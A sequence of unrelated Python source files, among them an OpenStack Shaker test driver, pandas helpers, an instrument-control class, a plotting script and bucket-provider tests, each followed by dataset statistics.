def check_requirements(self):
if self.count_hypervisors() < 2:
self.__logger.warning("Shaker requires at least 2 hypervisors")
self.is_skipped = True
self.project.clean()
def prepare(self):
super(Shaker, self).prepare()
self.cloud.create_security_group_rule(
self.sec.id, port_range_min=self.port, port_range_max=self.port,
protocol='tcp', direction='ingress')
def execute(self):
"""
Returns:
- 0 if success
- 1 on operation error
"""
assert self.ssh
endpoint = self.get_public_auth_url(self.orig_cloud)
self.__logger.debug("keystone endpoint: %s", endpoint)
if self.orig_cloud.get_role("admin"):
role_name = "admin"
elif self.orig_cloud.get_role("Admin"):
role_name = "Admin"
else:
raise Exception("Cannot detect neither admin nor Admin")
self.orig_cloud.grant_role(
role_name, user=self.project.user.id,
project=self.project.project.id,
domain=self.project.domain.id)
if not self.orig_cloud.get_role("heat_stack_owner"):
self.role = self.orig_cloud.create_role("heat_stack_owner")
self.orig_cloud.grant_role(
"heat_stack_owner", user=self.project.user.id,
project=self.project.project.id,
domain=self.project.domain.id)
self.orig_cloud.set_compute_quotas(
self.project.project.name,
instances=self.quota_instances,
cores=self.quota_cores)
scpc = scp.SCPClient(self.ssh.get_transport())
scpc.put('/home/opnfv/functest/conf/env_file', remote_path='~/')
if os.environ.get('OS_CACERT'):
scpc.put(os.environ.get('OS_CACERT'), remote_path='~/os_cacert')
(_, stdout, stderr) = self.ssh.exec_command(
'source ~/env_file && '
'export OS_INTERFACE=public && '
'export OS_AUTH_URL={} && '
'export OS_USERNAME={} && '
'export OS_PROJECT_NAME={} && '
'export OS_PROJECT_ID={} && '
'unset OS_TENANT_NAME && '
'unset OS_TENANT_ID && '
'unset OS_ENDPOINT_TYPE && '
'export OS_PASSWORD="{}" && '
'{}'
'env && '
'timeout {} shaker --debug --image-name {} --flavor-name {} '
'--server-endpoint {}:9000 --external-net {} --dns-nameservers {} '
'--scenario openstack/full_l2,'
'openstack/full_l3_east_west,'
'openstack/full_l3_north_south,'
'openstack/perf_l3_north_south '
'--report report.html --output report.json'.format(
endpoint, self.project.user.name, self.project.project.name,
self.project.project.id, self.project.password,
'export OS_CACERT=~/os_cacert && ' if os.environ.get(
'OS_CACERT') else '',
self.shaker_timeout, self.image.name, self.flavor.name,
self.fip.floating_ip_address, self.ext_net.id,
env.get('NAMESERVER')))
self.__logger.info("output:\n%s", stdout.read().decode("utf-8"))
self.__logger.info("error:\n%s", stderr.read().decode("utf-8"))
if not os.path.exists(self.res_dir):
os.makedirs(self.res_dir)
try:
scpc.get('report.json', self.res_dir)
scpc.get('report.html', self.res_dir)
except scp.SCPException:
self.__logger.exception("cannot get report files")
return 1
with open(os.path.join(self.res_dir, 'report.json')) as json_file:
data = json.load(json_file)
for value in data["records"].values():
if value["status"] != "ok":
self.__logger.error(
"%s failed\n%s", value["scenario"], value["stderr"])
return 1
return stdout.channel.recv_exit_status()
def clean(self):
super(Shaker, self).clean()
if self.role:
self.orig_cloud.delete_role(self.role.id)
| 37.910959
| 79
| 0.605239
| 679
| 5,535
| 4.740795
| 0.39028
| 0.041007
| 0.036347
| 0.014911
| 0.131718
| 0.082634
| 0.068966
| 0.068966
| 0.068966
| 0.045356
| 0
| 0.012935
| 0.273713
| 5,535
| 145
| 80
| 38.172414
| 0.787811
| 0.134417
| 0
| 0.073395
| 0
| 0.009174
| 0.218935
| 0.042688
| 0
| 0
| 0
| 0
| 0.009174
| 1
| 0.045872
| false
| 0.018349
| 0.055046
| 0
| 0.247706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5674a5616780733e828478139977dd1166a1db
| 2,288
|
py
|
Python
|
library/pandas_utils.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | 5
|
2021-01-14T03:34:42.000Z
|
2022-03-07T15:34:18.000Z
|
library/pandas_utils.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | 551
|
2020-10-19T00:02:38.000Z
|
2022-03-30T02:18:22.000Z
|
library/pandas_utils.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | null | null | null |
import os
import sys
import numpy as np
import pandas as pd
def get_columns_percent_dataframe(df: pd.DataFrame, totals_column=None, percent_names=True) -> pd.DataFrame:
""" @param totals_column: (default = use sum of columns)
@param percent_names: Rename names from 'col' => 'col %'
Return a dataframe as a percentage of totals_column if provided, or sum of columns """
percent_df = pd.DataFrame(index=df.index)
columns = df.columns
if totals_column:
totals_series = df[totals_column]
columns = columns - [totals_column]
else:
totals_series = df.sum(axis=1)
for col in columns:
new_col = col
if percent_names:
new_col = f"{new_col} %"
multiplier = 100.0 # to get percent
percent_df[new_col] = multiplier * df[col] / totals_series
return percent_df
def get_rows_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
row_sums = df.sum(axis=0)
return df.multiply(100.0) / row_sums
def get_total_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
total = df.sum(axis=0).sum()
return df.multiply(100.0) / total
def df_handle_below_minimum_floats(df: pd.DataFrame) -> pd.DataFrame:
def handle_if_below_min(series):
if series.dtype == 'd':
too_small_mask = abs(series) < sys.float_info.min
series[too_small_mask] = sys.float_info.min
return series
return df.apply(handle_if_below_min, axis=0)
def nan_to_none(val):
if np.isnan(val):
val = None
return val
def df_nan_to_none(df: pd.DataFrame) -> pd.DataFrame:
return df.where((pd.notnull(df)), None)
def df_replace_nan(df: pd.DataFrame, nan_replace='') -> pd.DataFrame:
return df.where((pd.notnull(df)), nan_replace)
def read_csv_skip_header(fle, header='#', **kwargs) -> pd.DataFrame:
if os.stat(fle).st_size == 0:
raise ValueError("File is empty")
with open(fle) as f:
pos = 0
cur_line = f.readline()
while cur_line.startswith(header):
pos = f.tell()
cur_line = f.readline()
f.seek(pos)
return pd.read_csv(f, **kwargs)
| 28.6
| 108
| 0.649913
| 338
| 2,288
| 4.213018
| 0.281065
| 0.108146
| 0.063904
| 0.042135
| 0.257725
| 0.192416
| 0.183287
| 0.161517
| 0.11236
| 0.11236
| 0
| 0.010315
| 0.237325
| 2,288
| 79
| 109
| 28.962025
| 0.805731
| 0.137675
| 0
| 0.039216
| 0
| 0
| 0.013361
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.078431
| 0.039216
| 0.431373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5794e6af44c9c1406d19b02f67dd498db59356
| 2,676
|
py
|
Python
|
create/create_args_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
create/create_args_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
create/create_args_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for create."""
import unittest
from unittest import mock
from acloud import errors
from acloud.create import create_args
from acloud.internal import constants
from acloud.internal.lib import driver_test_lib
def _CreateArgs():
"""set default pass in arguments."""
mock_args = mock.MagicMock(
flavor=None,
num=1,
adb_port=None,
hw_property=None,
stable_cheeps_host_image_name=None,
stable_cheeps_host_image_project=None,
username=None,
password=None,
cheeps_betty_image=None,
local_image=None,
local_kernel_image=None,
local_system_image=None,
system_branch=None,
system_build_id=None,
system_build_target=None,
local_instance=None,
remote_host=None,
host_user=constants.GCE_USER,
host_ssh_private_key_path=None,
avd_type=constants.TYPE_CF,
autoconnect=constants.INS_KEY_VNC)
return mock_args
# pylint: disable=invalid-name,protected-access
class CreateArgsTest(driver_test_lib.BaseDriverTest):
"""Test create_args functions."""
def testVerifyArgs(self):
"""test VerifyArgs."""
mock_args = _CreateArgs()
# Test args default setting shouldn't raise error.
self.assertEqual(None, create_args.VerifyArgs(mock_args))
def testVerifyArgs_ConnectWebRTC(self):
"""test VerifyArgs args.autconnect webrtc.
WebRTC only apply to remote cuttlefish instance
"""
mock_args = _CreateArgs()
mock_args.autoconnect = constants.INS_KEY_WEBRTC
# Test remote instance and avd_type cuttlefish(default)
# Test args.autoconnect webrtc shouldn't raise error.
self.assertEqual(None, create_args.VerifyArgs(mock_args))
# Test pass in none-cuttlefish avd_type should raise error.
mock_args.avd_type = constants.TYPE_GF
self.assertRaises(errors.UnsupportedCreateArgs,
create_args.VerifyArgs, mock_args)
if __name__ == "__main__":
unittest.main()
| 32.240964
| 74
| 0.702167
| 339
| 2,676
| 5.336283
| 0.454277
| 0.039801
| 0.039801
| 0.039801
| 0.114981
| 0.071863
| 0.071863
| 0.071863
| 0.071863
| 0.071863
| 0
| 0.004331
| 0.223468
| 2,676
| 82
| 75
| 32.634146
| 0.866218
| 0.37855
| 0
| 0.093023
| 0
| 0
| 0.004994
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 1
| 0.069767
| false
| 0.023256
| 0.139535
| 0
| 0.255814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe57a342e2e561171bed3dec28d69a69629da501
| 452
|
py
|
Python
|
setup.py
|
Kannuki-san/msman
|
adc275ad0508d65753c8424e7f6b94becee0b855
|
[
"MIT"
] | null | null | null |
setup.py
|
Kannuki-san/msman
|
adc275ad0508d65753c8424e7f6b94becee0b855
|
[
"MIT"
] | null | null | null |
setup.py
|
Kannuki-san/msman
|
adc275ad0508d65753c8424e7f6b94becee0b855
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from cx_Freeze import setup,Executable
icondata='icon.ico'
base = None
# GUI=有効, CUI=無効 にする
if sys.platform == 'win32' : base = 'win32GUI'
exe = Executable(script = 'main.py',
base = base,
#icon=icondata
)
setup(name = 'MSman',
version = '0.1',
description = 'Minecraft Server Manager',
executables = [exe]
)
| 17.384615
| 47
| 0.550885
| 52
| 452
| 4.769231
| 0.807692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022436
| 0.309735
| 452
| 26
| 48
| 17.384615
| 0.772436
| 0.163717
| 0
| 0
| 0
| 0
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe57f5cf47823b7ec7c95916bb4e6edc61679b1b
| 2,903
|
py
|
Python
|
stereotype/roles.py
|
petee-d/stereotype
|
33a2efc826fd907bd23ffb4e8f7cba119ff022ce
|
[
"MIT"
] | 6
|
2021-05-26T10:45:50.000Z
|
2022-01-31T17:36:10.000Z
|
stereotype/roles.py
|
petee-d/stereotype
|
33a2efc826fd907bd23ffb4e8f7cba119ff022ce
|
[
"MIT"
] | null | null | null |
stereotype/roles.py
|
petee-d/stereotype
|
33a2efc826fd907bd23ffb4e8f7cba119ff022ce
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from threading import Lock
from typing import List, Set, Optional, Any, Tuple
from stereotype.utils import ConfigurationError
class Role:
__slots__ = ('code', 'name', 'empty_by_default')
def __init__(self, name: str, empty_by_default: bool = False):
self.name = name
self.empty_by_default = empty_by_default
with _roles_lock:
self.code = len(_roles)
_roles.append(self)
def __repr__(self):
return f'<Role {self.name}, empty_by_default={self.empty_by_default}, code={self.code}>'
def __hash__(self):
return self.code
def __eq__(self, other):
return type(self) == type(other) and self.code == other.code
def whitelist(self, *fields, override_parents: bool = False):
return RequestedRoleFields(self, fields, is_whitelist=True, override_parents=override_parents)
def blacklist(self, *fields, override_parents: bool = False):
return RequestedRoleFields(self, fields, is_whitelist=False, override_parents=override_parents)
_roles: List[Role] = []
_roles_lock = Lock()
DEFAULT_ROLE = Role('default')
class FinalizedRoleFields:
__slots__ = ('role', 'fields')
def __init__(self, role: Role, fields: Optional[Set[str]] = None):
self.role = role
self.fields = fields or set()
def update_requested(self, other: RequestedRoleFields, all_field_names: Set[str], field_names: Set[str]):
assert self.role == other.role
if other.override_parents:
initial = set() if other.is_whitelist else all_field_names
else:
initial = self.fields
if other.is_whitelist:
self.fields = initial | other.fields
else:
self.fields = (initial | field_names) - other.fields
class RequestedRoleFields:
__slots__ = ('role', 'fields', 'is_whitelist', 'override_parents')
def __init__(self, role: Role, fields, is_whitelist: bool, override_parents: bool):
self.fields, non_descriptors = self._collect_input_fields(fields)
if non_descriptors:
raise ConfigurationError(f'Role blacklist/whitelist needs member descriptors (e.g. cls.my_field), '
f'got {non_descriptors[0]!r}')
self.role = role
self.is_whitelist = is_whitelist
self.override_parents = override_parents
def _collect_input_fields(self, fields) -> Tuple[Set[str], List[Any]]:
field_names: Set[str] = set()
non_descriptors: List[Any] = []
for field in fields:
if type(field).__name__ == 'member_descriptor':
field_names.add(field.__name__)
elif isinstance(field, property):
field_names.add(field.fget.__name__)
else:
non_descriptors.append(field)
return field_names, non_descriptors
| 34.975904
| 111
| 0.654151
| 344
| 2,903
| 5.18314
| 0.241279
| 0.092541
| 0.047112
| 0.050477
| 0.154795
| 0.117779
| 0.089736
| 0.089736
| 0.089736
| 0.089736
| 0
| 0.000456
| 0.244575
| 2,903
| 82
| 112
| 35.402439
| 0.812586
| 0
| 0
| 0.081967
| 0
| 0
| 0.093352
| 0.021702
| 0
| 0
| 0
| 0
| 0.016393
| 1
| 0.163934
| false
| 0
| 0.065574
| 0.081967
| 0.42623
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe59e0ae9caf8657811351b2ce6b7040c6d723dc
| 7,175
|
py
|
Python
|
WEB21-1-12/WEB2/power/zvl_test.py
|
coderdq/vuetest
|
28ea4f36e2c4e7e80d1ba1777ef312733ef84048
|
[
"MIT"
] | null | null | null |
WEB21-1-12/WEB2/power/zvl_test.py
|
coderdq/vuetest
|
28ea4f36e2c4e7e80d1ba1777ef312733ef84048
|
[
"MIT"
] | null | null | null |
WEB21-1-12/WEB2/power/zvl_test.py
|
coderdq/vuetest
|
28ea4f36e2c4e7e80d1ba1777ef312733ef84048
|
[
"MIT"
] | null | null | null |
# coding:utf-8
'''
矢网的测试项,包括增益,带内波动,VSWR
一个曲线最多建10个marker
'''
import os
import logging
from commoninterface.zvlbase import ZVLBase
logger = logging.getLogger('ghost')
class HandleZVL(object):
def __init__(self, ip, offset):
self.zvl = None
self.ip = ip
self.offset = float(offset)
def init_zvl(self, path):
logger.debug('init zvl')
self.zvl = ZVLBase()
self.zvl.init_inst(self.ip)
self.zvl.reset_zvl()
self.path = path # 存储图片的路径
def close_zvl(self):
self.zvl.close_inst()
def set_edge(self, low_edge, up_edge):
'''
:param low_edge: float单位MHz
:param up_edge: float单位MHz
:return:
'''
try:
low = '{}MHz'.format(low_edge)
up = '{}MHz'.format(up_edge)
self.zvl.set_freq(low, up)
return True
except Exception as e:
logger.error('set_edge error {}'.format(e))
return False
def set_trace(self, tracen, form, means):
'''
:param tracen: int
form:str,
means:str,'S11','S12','S21','S22'
:return:
'''
try:
self.zvl.set_trace_form(tracen, form)
self.zvl.change_trace_meas(tracen, means)
if form == 'MLOG':
self.zvl.set_div_value(tracen, 10)
# zvl.set_ref_value(zvlhandler, tracen, -40)
return True
except Exception as e:
logger.error('set_trace error {}'.format(e))
return False
def read_markery(self, tracen, markern, x):
x_str = '{}MHz'.format(x)
self.zvl.set_trace_marker(tracen, markern, x_str) # 设置marker点
_, marker1y = self.zvl.query_marker(tracen, markern)
return marker1y
def read_max_marker(self, tracen, markern):
try:
self.zvl.create_max_marker(tracen, markern) # max marker
# create_max_marker(zvlhandler, tracen, markern + 1) # max marker
marker1x, marker1y = self.zvl.query_marker(tracen, markern)
return float(marker1x) / 1000000.0, marker1y
except Exception as e:
logger.error('get_max_loss error {}'.format(e))
return None
def get_ripple_in_bw(self, tracen, markern):
'''
带内波动
:return:
'''
try:
self.zvl.create_min_marker(tracen, markern) # min marker
self.zvl.create_max_marker(tracen, markern + 1) # max marker
_, marker1y = self.zvl.query_marker(tracen, markern)
_, marker2y = self.zvl.query_marker(tracen, markern + 1)
absy = abs(float(marker1y) - float(marker2y))
return absy
except Exception as e:
logger.error('get_ripple_in_bw error{}'.format(e))
return None
def get_gain(self, *args):
'''
读取增益及带内波动
S21 dBmg
:return:高,中,低点增益,带内波动
'''
logger.debug('zvl get gain')
high, mid, low = args # 高中低
self.zvl.remove_allmarker(1)
self.set_edge(low, high)
tracen = 1
self.set_trace(tracen, 'MLOG', 'S21')
markern = 1
# 读高,中,低点的增益
high_markery = float(self.read_markery(tracen, markern, high))
markern += 1
mid_markery = float(self.read_markery(tracen, markern, mid))
markern += 1
low_markery = float(self.read_markery(tracen, markern, low))
# 带内波动
markern += 1
ripple = self.get_ripple_in_bw(tracen, markern) # 绝对值
ret = [high_markery + self.offset, mid_markery + self.offset,
low_markery + self.offset, ripple]
ret2 = ['%.2f' % float(item) for item in ret]
return ret2
def get_vswr(self, *args):
'''
VSWR S11,SWR
:return:max markerx,max markery
'''
logger.debug('zvl get_vswr')
self.zvl.remove_allmarker(1)
high, mid, low, dl_ul,temp = args # 高中低
tracen = 1
markern = 1
start = float(low) - 2.5
end = float(high) + 2.5
self.set_edge(start, end)
self.set_trace(tracen, 'SWR', 'S11')
marker = self.read_max_marker(tracen, markern)
# 截图
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_{}_VSWR.PNG'.format(temp, dl_ul,end))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
# mstr='@'.join([str(item) for item in marker])
marker2 = ['%.2f' % float(item) for item in marker]
return marker2
def get_gain_vs_freq(self, markerlist,dl_ul, temp):
'''
825~835MHz,870~880,890~915,935~960,1570.42~1585,
1710~1785,1805~1880,1920~1980,2110~2170,
2570~2620,1880~1915,2300~2400,2400~2483.5
截图三张,一张图最多截10个marker
markerlist:[]
:return:
'''
logger.debug('zvl get_gain_vs_freq')
self.zvl.remove_allmarker(1)
tracen = 1
markern = 1
self.set_trace(tracen, 'MLOG', 'S21')
markery_list = [] # 所有点的增益,注意要加上offset
try:
# 第一张图
self.set_edge(700, 1700)
marker_lst = markerlist[:10]
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern) # str
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_1.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
self.zvl.remove_allmarker(1)
# 第二张图
marker_lst = markerlist[10:20]
markern = 1
self.set_edge(1700, 3000)
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern)
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_2.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
self.zvl.remove_allmarker(1)
# 第三张图
marker_lst = markerlist[20:]
markern = 1
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern)
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_3.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
except Exception as e:
logger.error(e)
finally:
# logger.debug(markery_list)
ret = ['%.2f' % (float(item) + self.offset) for item in markery_list]
return ret
| 34.830097
| 108
| 0.557073
| 879
| 7,175
| 4.386803
| 0.202503
| 0.058091
| 0.073911
| 0.032676
| 0.486515
| 0.432313
| 0.392894
| 0.280083
| 0.256743
| 0.225104
| 0
| 0.043612
| 0.319303
| 7,175
| 205
| 109
| 35
| 0.745905
| 0.106481
| 0
| 0.414286
| 0
| 0
| 0.058075
| 0.011256
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078571
| false
| 0
| 0.021429
| 0
| 0.192857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5a25378e13e098be2b1cdb76f7062e2c91b9b5
| 2,410
|
py
|
Python
|
kshell/partial_level_density.py
|
ErlendLima/70Zn
|
1bf73adec5a3960e195788bc1f4bc79b2086be64
|
[
"MIT"
] | null | null | null |
kshell/partial_level_density.py
|
ErlendLima/70Zn
|
1bf73adec5a3960e195788bc1f4bc79b2086be64
|
[
"MIT"
] | null | null | null |
kshell/partial_level_density.py
|
ErlendLima/70Zn
|
1bf73adec5a3960e195788bc1f4bc79b2086be64
|
[
"MIT"
] | null | null | null |
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import shellmodelutilities as smutil
# Set bin width and range
bin_width = 0.20
Emax = 14
Nbins = int(np.ceil(Emax/bin_width))
Emax_adjusted = bin_width*Nbins # Trick to get an integer number of bins
bins = np.linspace(0,Emax_adjusted,Nbins+1)
# Define list of calculation input files and corresponding label names
inputfile = "summary_Zn70_jun45.txt"
# Instantiate figure which we will fill
f_rho, ax_rho = plt.subplots(1,1)
# Read energy levels from file
levels = smutil.read_energy_levels(inputfile)
# Choose which [2*J,pi] combinations to include in partial level density plot
Jpi_list = [[0,-1],[2,-1],[4,-1],[6,-1],[8,-1],[10,-1],[12,-1],[14,-1],[16,-1],[18,-1],[20,-1],[22,-1],[24,-1],[26,-1],[28,-1],
[0,+1],[2,+1],[4,+1],[6,+1],[8,+1],[10,+1],[12,+1],[14,+1],[16,+1],[18,+1],[20,+1],[22,+1],[24,+1],[26,+1],[28,+1]]
# Allocate (Ex,Jpi) matrix to store partial level density
rho_ExJpi = np.zeros((Nbins,len(Jpi_list)))
# Count number of levels for each (Ex, J, pi) pixel.
Egs = levels[0,0] # Ground state energy
for i_l in range(len(levels[:,0])):
E, J, pi = levels[i_l]
# Skip if level is outside range:
if E-Egs >= Emax:
continue
i_Ex = int(np.floor((E-Egs)/bin_width))
try:
i_Jpi = Jpi_list.index([J,pi])
except:
continue
rho_ExJpi[i_Ex,i_Jpi] += 1
rho_ExJpi /= bin_width # Normalize to bin width, to get density in MeV^-1
# Plot it
from matplotlib.colors import LogNorm # To get log scaling on the z axis
colorbar_object = ax_rho.pcolormesh(np.linspace(0,len(Jpi_list)-1,len(Jpi_list)), bins, rho_ExJpi, norm=LogNorm())
f_rho.colorbar(colorbar_object) # Add colorbar to plot
# Make the plot nice
ax_rho.set_xlabel(r"$\pi\cdot J\,\mathrm{(\hbar)}$")
ax_rho.set_ylabel(r'$E_x \, \mathrm{(MeV)}$')
# A bit of Python voodoo to get the x labels right:
Jpi_array = np.append(np.linspace(0,-int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2)),np.linspace(0,int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2))) # Array of pi*J for plot
def format_func(value, tick_number):
if value >= 0 and value <= 28:
return int(Jpi_array[int(value)])
else:
return None
ax_rho.set_xlim([0,29])
ax_rho.xaxis.set_major_formatter(plt.FuncFormatter(format_func))
ax_rho.set_xticks([0,2,4,6,8,10,12,14,15,17,19,21,23,25,27])
# Show plot
plt.show()
| 34.927536
| 170
| 0.674274
| 446
| 2,410
| 3.515695
| 0.374439
| 0.040179
| 0.044643
| 0.033163
| 0.102041
| 0.102041
| 0.102041
| 0.102041
| 0.102041
| 0.102041
| 0
| 0.068226
| 0.148548
| 2,410
| 68
| 171
| 35.441176
| 0.695906
| 0.26805
| 0
| 0.047619
| 0
| 0
| 0.04298
| 0.012607
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.119048
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5b20986b78369a49dfb31999fcc5213f36f3e2
| 15,480
|
py
|
Python
|
tests/integration/test_provider_base.py
|
neuro-inc/platform-buckets-api
|
ba04edeb8565fa06e5af6d0316957a8816b087b2
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_provider_base.py
|
neuro-inc/platform-buckets-api
|
ba04edeb8565fa06e5af6d0316957a8816b087b2
|
[
"Apache-2.0"
] | 55
|
2021-11-16T00:26:52.000Z
|
2022-03-29T03:16:55.000Z
|
tests/integration/test_provider_base.py
|
neuro-inc/platform-buckets-api
|
ba04edeb8565fa06e5af6d0316957a8816b087b2
|
[
"Apache-2.0"
] | null | null | null |
import abc
import secrets
from collections.abc import AsyncIterator, Awaitable, Callable, Mapping
from contextlib import AbstractAsyncContextManager, asynccontextmanager
from dataclasses import dataclass
from datetime import datetime, timezone
import pytest
from aiohttp import ClientSession
from yarl import URL
from platform_buckets_api.providers import (
BucketExistsError,
BucketNotExistsError,
BucketPermission,
BucketProvider,
RoleExistsError,
UserBucketOperations,
)
from platform_buckets_api.storage import ImportedBucket, ProviderBucket
BUCKET_NAME_PREFIX = "integration-tests-"
ROLE_NAME_PREFIX = "integration-tests-"
def _make_bucket_name() -> str:
return BUCKET_NAME_PREFIX + secrets.token_hex(5)
def _make_role_name() -> str:
return ROLE_NAME_PREFIX + secrets.token_hex(5)
class BasicBucketClient(abc.ABC):
@abc.abstractmethod
async def put_object(self, key: str, data: bytes) -> None:
pass
@abc.abstractmethod
async def read_object(self, key: str) -> bytes:
pass
@abc.abstractmethod
async def list_objects(self) -> list[str]:
pass
@abc.abstractmethod
async def delete_object(self, key: str) -> None:
pass
@dataclass()
class ProviderTestOption:
type: str
provider: BucketProvider
bucket_exists: Callable[[str], Awaitable[bool]]
make_client: Callable[
[ProviderBucket, Mapping[str, str]],
AbstractAsyncContextManager[BasicBucketClient],
]
get_admin: Callable[
[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]
]
role_exists: Callable[[str], Awaitable[bool]]
get_public_url: Callable[[str, str], URL]
credentials_for_imported: Mapping[str, str]
def as_admin_cm(
creator_func: Callable[[ProviderBucket], BasicBucketClient]
) -> Callable[[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]]:
@asynccontextmanager
async def creator(bucket: ProviderBucket) -> AsyncIterator[BasicBucketClient]:
yield creator_func(bucket)
return creator
# Access checkers
async def _test_no_access(
admin_client: BasicBucketClient,
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = secrets.token_hex(8)
with pytest.raises(Exception):
await user_client.put_object(key, data)
await admin_client.put_object(key, data)
with pytest.raises(Exception):
await user_client.read_object(key)
with pytest.raises(Exception):
await user_client.list_objects()
with pytest.raises(Exception):
await user_client.delete_object(key)
async def _test_read_access(
admin_client: BasicBucketClient,
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = "foo"
with pytest.raises(Exception):
await user_client.put_object(key, data)
await admin_client.put_object(key, data)
assert await user_client.read_object(key) == data
assert key in await user_client.list_objects()
with pytest.raises(Exception):
await user_client.delete_object(key)
async def _test_write_access(
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = "foo"
await user_client.put_object(key, data)
assert await user_client.read_object(key) == data
assert key in await user_client.list_objects()
await user_client.delete_object(key)
assert key not in await user_client.list_objects()
class TestProviderBase:
__test__ = False
